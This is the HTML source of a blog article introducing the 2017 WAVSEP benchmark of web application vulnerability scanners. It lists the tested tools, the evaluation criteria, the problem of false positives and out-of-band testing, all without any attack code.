  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;48&quot; Name=&quot;Grid Table 3 Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;49&quot; Name=&quot;Grid Table 4 Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;50&quot; Name=&quot;Grid Table 5 Dark Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;51&quot;
   Name=&quot;Grid Table 6 Colorful Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;52&quot;
   Name=&quot;Grid Table 7 Colorful Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;46&quot; Name=&quot;List Table 1 Light&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;47&quot; Name=&quot;List Table 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;48&quot; Name=&quot;List Table 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;49&quot; Name=&quot;List Table 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;50&quot; Name=&quot;List Table 5 Dark&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;51&quot; Name=&quot;List Table 6 Colorful&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;52&quot; Name=&quot;List Table 7 Colorful&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;46&quot;
   Name=&quot;List Table 1 Light Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;47&quot; Name=&quot;List Table 2 Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;48&quot; Name=&quot;List Table 3 Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;49&quot; Name=&quot;List Table 4 Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;50&quot; Name=&quot;List Table 5 Dark Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;51&quot;
   Name=&quot;List Table 6 Colorful Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;52&quot;
   Name=&quot;List Table 7 Colorful Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;46&quot;
   Name=&quot;List Table 1 Light Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;47&quot; Name=&quot;List Table 2 Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;48&quot; Name=&quot;List Table 3 Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;49&quot; Name=&quot;List Table 4 Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;50&quot; Name=&quot;List Table 5 Dark Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;51&quot;
   Name=&quot;List Table 6 Colorful Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;52&quot;
   Name=&quot;List Table 7 Colorful Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;46&quot;
   Name=&quot;List Table 1 Light Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;47&quot; Name=&quot;List Table 2 Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;48&quot; Name=&quot;List Table 3 Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;49&quot; Name=&quot;List Table 4 Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;50&quot; Name=&quot;List Table 5 Dark Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;51&quot;
   Name=&quot;List Table 6 Colorful Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;52&quot;
   Name=&quot;List Table 7 Colorful Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;46&quot;
   Name=&quot;List Table 1 Light Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;47&quot; Name=&quot;List Table 2 Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;48&quot; Name=&quot;List Table 3 Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;49&quot; Name=&quot;List Table 4 Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;50&quot; Name=&quot;List Table 5 Dark Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;51&quot;
   Name=&quot;List Table 6 Colorful Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;52&quot;
   Name=&quot;List Table 7 Colorful Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;46&quot;
   Name=&quot;List Table 1 Light Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;47&quot; Name=&quot;List Table 2 Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;48&quot; Name=&quot;List Table 3 Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;49&quot; Name=&quot;List Table 4 Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;50&quot; Name=&quot;List Table 5 Dark Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;51&quot;
   Name=&quot;List Table 6 Colorful Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;52&quot;
   Name=&quot;List Table 7 Colorful Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;46&quot;
   Name=&quot;List Table 1 Light Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;47&quot; Name=&quot;List Table 2 Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;48&quot; Name=&quot;List Table 3 Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;49&quot; Name=&quot;List Table 4 Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;50&quot; Name=&quot;List Table 5 Dark Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;51&quot;
   Name=&quot;List Table 6 Colorful Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;52&quot;
   Name=&quot;List Table 7 Colorful Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Mention&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Smart Hyperlink&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Hashtag&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Unresolved Mention&quot;/&gt;
 &lt;/w:LatentStyles&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Table Normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-priority:99;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0in 5.4pt 0in 5.4pt;
 mso-para-margin-top:0in;
 mso-para-margin-right:0in;
 mso-para-margin-bottom:8.0pt;
 mso-para-margin-left:0in;
 line-height:107%;
 mso-pagination:widow-orphan;
 font-size:11.0pt;
 font-family:&quot;Calibri&quot;,sans-serif;
 mso-ascii-font-family:Calibri;
 mso-ascii-theme-font:minor-latin;
 mso-hansi-font-family:Calibri;
 mso-hansi-theme-font:minor-latin;
 mso-bidi-font-family:Arial;
 mso-bidi-theme-font:minor-bidi;}
table.MsoTableGrid
 {mso-style-name:&quot;Table Grid&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-priority:39;
 mso-style-unhide:no;
 border:solid windowtext 1.0pt;
 mso-border-alt:solid windowtext .5pt;
 mso-padding-alt:0in 5.4pt 0in 5.4pt;
 mso-border-insideh:.5pt solid windowtext;
 mso-border-insidev:.5pt solid windowtext;
 mso-para-margin:0in;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:11.0pt;
 font-family:&quot;Calibri&quot;,sans-serif;
 mso-ascii-font-family:Calibri;
 mso-ascii-theme-font:minor-latin;
 mso-hansi-font-family:Calibri;
 mso-hansi-theme-font:minor-latin;
 mso-bidi-font-family:Arial;
 mso-bidi-theme-font:minor-bidi;}
&lt;/style&gt;
&lt;![endif]--&gt;

&lt;br /&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;border-collapse: collapse; border: none; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0in 5.4pt 0in 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr style=&quot;mso-yfti-firstrow: yes; mso-yfti-irow: 0; mso-yfti-lastrow: yes;&quot;&gt;
  &lt;td style=&quot;background: #404040; border: solid windowtext 1.0pt; mso-background-themecolor: text1; mso-background-themetint: 191; mso-border-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 143.8pt;&quot; valign=&quot;top&quot; width=&quot;192&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;b&gt;DAST vs SAST vs IAST -&lt;/b&gt; &lt;a href=&quot;http://sectooladdict.blogspot.co.il/2017/05/dast-vs-sast-vs-iast-modern-ssldc-best.html&quot; target=&quot;_blank&quot;&gt;Modern  SSDLC Guide&lt;/a&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;background: #404040; border-left: none; border: solid windowtext 1.0pt; mso-background-themecolor: text1; mso-background-themetint: 191; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 143.85pt;&quot; valign=&quot;top&quot; width=&quot;192&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;b&gt;Scanner Selection Wizard&lt;/b&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
A Step by Step Guide for Choosing the
  Right Web Application Vulnerability Scanner for *You*&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;a href=&quot;http://www.infosecisland.com/blogview/21926-A-Step-by-Step-Guide-for-Choosing-the-Best-Scanner.html&quot; target=&quot;_blank&quot;&gt;infosec-island&lt;/a&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;background: #404040; border-left: none; border: solid windowtext 1.0pt; mso-background-themecolor: text1; mso-background-themetint: 191; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 143.85pt;&quot; valign=&quot;top&quot; width=&quot;192&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;b&gt;Sectoolmarket / TECAPI&lt;/b&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
Detailed Result Presentation at &lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: red;&quot;&gt;&lt;a href=&quot;http://tecapi.com/public/relative-vulnerability-rating-gui.jsp&quot; target=&quot;_blank&quot;&gt;http://tecapi.com/&lt;/a&gt;&lt;/span&gt;
  &lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
And&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
http://www.sectoolmarket.com &lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
(&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;Not Updated
  Yet&lt;/span&gt;&lt;/b&gt;)&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;span style=&quot;font-size: x-large;&quot;&gt;&lt;u&gt;1. Introduction&lt;/u&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;br /&gt;
Two years of preparations, development and research had finally come to fruition, and the 2017 WAVSEP benchmark is finally here.&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;It includes &lt;b&gt;extremely useful &lt;/b&gt;information for anyone planning to integrate DAST scanners into SDLC processes, compares numerous features of commercial and open-source solutions, and demonstrates how far these technologies advanced and matured over the last decade. &lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Like the benchmarks published in previous years, WAVSEP covers the main contenders in the DAST (dynamic application security testing) field, both open source and commercial.&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;color: cyan;&quot;&gt;&lt;b&gt;We did a couple of things different this time. &lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
We&#39;ve been to the field, integrated, and implemented the automated-periodic execution of the various tested solutions in &lt;b&gt;real-life enterprise SDLC processes &lt;/b&gt;to test their effectiveness - gaining some real-life experiences to better help us understand the field and the requirements -&lt;br /&gt;
&lt;br /&gt;
And during at least 4-5 long-term implementations of DAST/SAST/IAST solutions in SSDLC processes for financial / hi-tech / telcom organizations,&lt;br /&gt;
we attempted to directly and indirectly handle modern technologies 
(SPA/angular/react/etc) and complex architectures to see if the various 
vendor-proclaimed features actually work, &lt;br /&gt;
and with solutions ranging from prominent open source projects to high-end enterprise commercial solutions, that processes yielded some interesting conclusions.&lt;br /&gt;
&lt;br /&gt;
Some of these experiences led us to develop test cases aimed to inspect issues in proclaimed features that we noticed didn&#39;t work as expected in actual implementations, and some to the creation of comparison categories that are apparently &lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;crucial &lt;/b&gt;&lt;/span&gt;for real-world implementations.&lt;br /&gt;
&lt;br /&gt;
The &lt;b&gt;wavsep &lt;/b&gt;evaluation test-bed (now at version 1.7) was expanded with additional test cases, and a new wavsep-mirror project called &lt;b&gt;wavsep-ext&lt;/b&gt; was created to host JSON/XML test case variants.&lt;br /&gt;
&lt;br /&gt;
Before discussing the actual content, I&#39;d like to extend my &lt;b&gt;&lt;span style=&quot;color: magenta;&quot;&gt;deep gratitude&lt;/span&gt; &lt;/b&gt;to the various volunteers that assisted in obtaining and compiling the vast amount of information, and even more important, in compiling it to a (relatively) readable format. I&#39;d also like to thank the vendors, which assisted us in licensing, unrealistic response times, and by pushing us to move forward with the evaluation.&lt;br /&gt;
&lt;br /&gt;
And for the curious - a simple explanation to an expected question - &lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
Why did the publication delay so long ? &lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;border-collapse: collapse; border: none; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0in 5.4pt 0in 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
  &lt;td style=&quot;background: #404040; border: solid windowtext 1.0pt; mso-background-themecolor: text1; mso-background-themetint: 191; mso-border-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 431.5pt;&quot; valign=&quot;top&quot; width=&quot;575&quot;&gt;Each benchmark is typically more complicated than the previous one, 
primarly because of our goal to cover additional aspects in each 
publication, which requires us to expand the test-beds (via the development of new test cases or usage of new test-beds).&lt;br /&gt;
&lt;br /&gt;
Some of these &quot;expansions&quot; require unproportional amount of effort -&lt;br /&gt;
&lt;br /&gt;
For example - &lt;br /&gt;
&lt;br /&gt;
Some of the newly implemented test cases required the scanner to both 
crawl javascript/jquery/ajax driven web pages, and eventually scan entry
 points that expect JSON/XML input being sent through those pages.&lt;br /&gt;
&lt;br /&gt;
During the test, &lt;span style=&quot;color: cyan;&quot;&gt;&lt;b&gt;many scanners&lt;/b&gt; &lt;/span&gt;surprisingly did
&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt; NOT &lt;/b&gt;&lt;/span&gt;manage to crawl the JSON/XML pages (due to lack of relevant 
crawling features, bugs, or perhaps our specific implementation).&lt;br /&gt;
&lt;br /&gt;
So, prior to scanning, for over &lt;b&gt;250+&lt;/b&gt; different JSON/XML test cases, we had to &lt;b&gt;manually &lt;/b&gt;teach
 the various tested tools the structure of the XML/JSON requests and 
parameters, or when we got lucky and had a valid license to a scanner 
that could crawl these new tests cases - chain the scanner to our 
various tools that couldn&#39;t.&lt;br /&gt;
&lt;br /&gt;
Since these licenses 
typically expired just when we needed them... most of that work was 
manual, and thus, setbacks during these assessments became common, and QA session became longer and more time-consuming.&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;And with that out of the way, we can start cover this year&#39;s content -&lt;br /&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;span style=&quot;font-size: x-large;&quot;&gt;&lt;u&gt;2. Benchmark Overview&lt;/u&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;br /&gt;
&lt;h3&gt;
&lt;b&gt;2.1 List of Tested Web Application Scanners&lt;/b&gt;&lt;/h3&gt;
&lt;h3&gt;
&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/h3&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
Evaluated commercial web application scanners:&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;Appspider v6.14.060 (Rapid7 ltd, acquirer of NTO)&lt;/li&gt;
&lt;li&gt;Netsparker v4.8 (Netsparker ltd.)&lt;/li&gt;
&lt;li&gt;Acunetix v11.0.x build 171181742 (Acunetix ltd.)&lt;/li&gt;
&lt;li&gt;Burpsuite v1.7.23 (Portswigger)&lt;/li&gt;
&lt;li&gt;WebInspect v17.10XX (HPE)&lt;/li&gt;
&lt;li&gt;WebCruiser v3.5.4 (Janusec)&lt;/li&gt;
&lt;/ul&gt;
Evaluated open source scanners:&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;Zed Attack Proxy (ZAP) 2.6.0&lt;/li&gt;
&lt;li&gt;Arachni 1.5-0.5.11&lt;/li&gt;
&lt;li&gt;IronWASP 0.9.8.6&lt;/li&gt;
&lt;li&gt;WATOBO v0.9.22&lt;/li&gt;
&lt;/ul&gt;
&lt;b&gt;Previously evaluated / upcoming evaluations &lt;/b&gt;of commercial
web application scanners: &lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;Appscan v9.0.0.999 build 466 -&lt;b&gt; 2014/2015&lt;/b&gt; (IBM)&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Syhunt Dynamic v5.0.0.7 RC2 - &lt;b&gt;2014/2015&lt;/b&gt; (Syhunt)&lt;/li&gt;
&lt;li&gt;N-Stalker Enterprise v10.14.1.7 - &lt;b&gt;2014/2015 &lt;/b&gt;(N-Stalker)(Results for new benchmark
tests for most of these products will be updated soon in &lt;a href=&quot;http://www.sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html&quot;&gt;STM&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;
Legacy/Inactive commercial web application scanners results were not included (but are still included in the various charts in &lt;a href=&quot;http://www.sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html&quot;&gt;STM&lt;/a&gt;):&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;ParosPro v1.9.12 (Milescan)&amp;nbsp;&lt;/li&gt;
&lt;li&gt;JSky v3.5.1-905 (NoSec)&lt;/li&gt;
&lt;li&gt;Ammonite v1.2 (RyscCorp)&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;b&gt;Previously evaluated / upcoming evaluations&lt;/b&gt; of open source web application scanners:&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;W3AF 1.6&lt;/li&gt;
&lt;li&gt;Vega 1.0&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Wapiti 2.3.0&lt;/li&gt;
&lt;li&gt;Skipfish 2.1.0&lt;/li&gt;
&lt;li&gt;sqlmap 1.0&lt;/li&gt;
&lt;li&gt;XSSer 1.6.1&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
In regard to vendors with newer production versions that were NOT evaluated, we either initially got a license which expired mid test and then didn&#39;t manage to contact the vendor in time (the contacts we had were unreachable / no longer worked for the vendor), or the budget and deadline we had for the project required us to restrict our coverage to a limited set of vendors.&lt;br /&gt;
&lt;br /&gt;
Some of the unevaluated newer product versions will be covered in the upcoming weeks, while new and previously uncovered contenders may refer to the &lt;b&gt;join-wavsep&lt;/b&gt; section in&lt;b&gt; &lt;a href=&quot;http://www.sectoolmarket.com/joining-the-comparison.html&quot; target=&quot;_blank&quot;&gt;STM&lt;/a&gt;&lt;/b&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;h3&gt;
&lt;b&gt;2.2 The Evaluation Criteria&lt;/b&gt;&lt;/h3&gt;
&lt;h3&gt;
&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/h3&gt;
The 2017 evaluation focused on several previously uncovered aspects, in addition to &quot;repeating&quot; most of the tests performed on previous benchmarks:&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;Covering the prominent vendors in 2017, and the newly introduced technologies in the field, and their effect on various users (penetration testers, SSDLC users). &lt;/li&gt;
&lt;li&gt;Assessing the detection ratio of previously tested vulnerabilities in modern &lt;b&gt;JSON/XML&lt;/b&gt; input vectors - to verify the proclaimed support for the attack vector in the various categories (extremely interesting results that affect the overall scores).&amp;nbsp; For that purpose, &lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;MANY&lt;/b&gt;&lt;/span&gt; test cases were re-implemented with JSON/XML inputs, posing a challenge for both scanning features (covered in the article) and crawling features (will be discussed in future article updates)&lt;/li&gt;
&lt;li&gt;Assessing the detection of additional vulnerabilities (&lt;b&gt;OS Command Injection&lt;/b&gt;, repurposing XSS-via-RFI test to be used for SSRF evaluations as well).&lt;/li&gt;
&lt;li&gt;The release of a new version of wavsep evaluation test-bed, available in wavsep git-hub and source-forge repositories.&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
The article attempts to &lt;b&gt;simplify&lt;/b&gt; the presentation of content, and as a result, various additional elements will &lt;b&gt;only &lt;/b&gt;be presented and updated through the benchmark presentation platform residing at &lt;b&gt;&lt;a href=&quot;http://www.sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html&quot; target=&quot;_blank&quot;&gt;STM&lt;/a&gt;&lt;/b&gt; (full and extensive list of features, scan logs, etc).&lt;br /&gt;
&lt;br /&gt;
Before we start with the raw stats, it&#39;s important to cover a few subjects related to the technologies being evaluated:&lt;br /&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;/h2&gt;
&lt;h3&gt;
&lt;b&gt;2.3 The False Positive Aspect in Penetration-Tests / SSDLC&lt;/b&gt;&lt;/h3&gt;
&lt;br /&gt;
Depending on the vulnerability assessment process, false positives will typically have the following effect:&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;An (arguably) &lt;b&gt;&lt;span style=&quot;color: #9fc5e8;&quot;&gt;minor &lt;/span&gt;&lt;/b&gt;time consuming effect in external penetration tests (in the context of a manual-driven pentest)&lt;/li&gt;
&lt;li&gt;A &lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;major &lt;/b&gt;&lt;/span&gt;time consumer in the overall scale of periodic automated scans within SSDLC scenarios &amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
Weeding out a &lt;b&gt;reasonable &lt;/b&gt;amount of false positives during a pentest is not ideal, but could be performed with relative ease. However, thousands upon thousands of false positives in enterprise SSDLC periodic scan scenarios can take their toll.&lt;br /&gt;
&lt;br /&gt;
Replacing DAST technologies (&quot;scanners&quot;) in &lt;b&gt;black box penetration tests&lt;/b&gt;, a widespread and widely consumed commodity these days, &lt;span style=&quot;color: yellow;&quot;&gt;&lt;b&gt;does not seem likely&lt;/b&gt;&lt;/span&gt; in the &lt;u&gt;visible&lt;/u&gt; future.&lt;br /&gt;
The concept of a &lt;b&gt;black-box&lt;/b&gt; penetration test prevents inherently &quot;intrusive&quot; technologies (IAST/SAST) from being used by the &lt;b&gt;external&lt;/b&gt; assessing entity in the vast majority of scenarios.&lt;br /&gt;
&lt;br /&gt;
However, in SSDLC driven assessments (secure software development life-cycle), such as periodic scanning / build-triggered scanning, DAST technologies are challenged by SAST / IAST / Hybrid technologies.&lt;br /&gt;
&lt;br /&gt;
Several years of fierce competition and the adoption of additional technologies for vulnerability detection (IAST / SAST / OSS) hasn&#39;t been easy for the various vendors, and even prompted certain entities to proclaim that DAST technologies are obsolete, and/or superceded by SAST/IAST technologies.&lt;br /&gt;
&lt;br /&gt;
In the long run &lt;b&gt;however&lt;/b&gt;, competition tends to have &lt;b&gt;positive impacts on technology (and quality)&lt;/b&gt;, and in the case of DAST vendors, in addition to enhanced technology support and adaptation, the detection ratio of exposures and ratio of false positive exposures in &lt;u&gt;maintained&lt;/u&gt; DAST solutions was improved &lt;u&gt;drastically,&lt;/u&gt; due to enhancements and a new DAST-related technology -&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h3&gt;
&lt;b&gt;2.4 Enter Out-of-Band-Security-Testing (OAST) - Overview&lt;/b&gt;&lt;/h3&gt;
&lt;br /&gt;
The technological response of DAST vendors to the enhanced accuracy of Active IAST capabilities, whether intentional or unrelated, includes (among additional enhancements) tests falling under the category of &lt;b&gt;Out-of-Band&lt;/b&gt; security testing (sometimes coined OAST, to match the typically used naming convention), a previously &lt;b&gt;understated &lt;/b&gt;and an &lt;span style=&quot;color: yellow;&quot;&gt;&lt;b&gt;unprecedentedly accurate&lt;/b&gt;&lt;/span&gt; method of identifying second order vulnerabilities (&quot;blind&quot;/&quot;indirect&quot;) and reducing false positives, keeping DAST technologies well within the race of relevant technologies.&lt;br /&gt;
&lt;br /&gt;
The concept of &lt;b&gt;OAST &lt;/b&gt;tests is to inject exploitation &quot;payloads&quot; that correspond with verification-servers in the internet, which are able to identify and associate external access to a specific vulnerability test in a specific scan.&lt;br /&gt;
&lt;br /&gt;
So, let&#39;s say for example that an Out-of-Band SQL/XSS injection payloads were used in a scan and stored in the database, they may only be &quot;executed&quot; at a later phase, such as when an administrator views logs of application activities that include these payloads, or when a processing script is running on database content. While &quot;normal&quot; scanner injection tests would have likely missed the exposure, out-of-band exploitation payloads &quot;report&quot; to to the external server when executed, enabling the scanner to (eventually) identify the vulnerability.&lt;br /&gt;
&lt;br /&gt;
Although out-of-band payloads are not yet included in all of the relevant scan &quot;plugins&quot; of the various vendors, the support for these tests is becoming more extensive, at least for some of the commercial vendors.&amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Coupled with the other accuracy enhancement in DAST technologies (algorithm/attack-tree improvements), out-of-band-testing can provide &lt;b&gt;a huge boost &lt;/b&gt;to both detection accuracy and to the &lt;b&gt;type of vulnerabilities&lt;/b&gt; automated scanning solutions (DAST in this case) are able to identify.&lt;br /&gt;
&lt;br /&gt;
And now, to the main point -&lt;br /&gt;
&lt;br /&gt;
&lt;h2&gt;
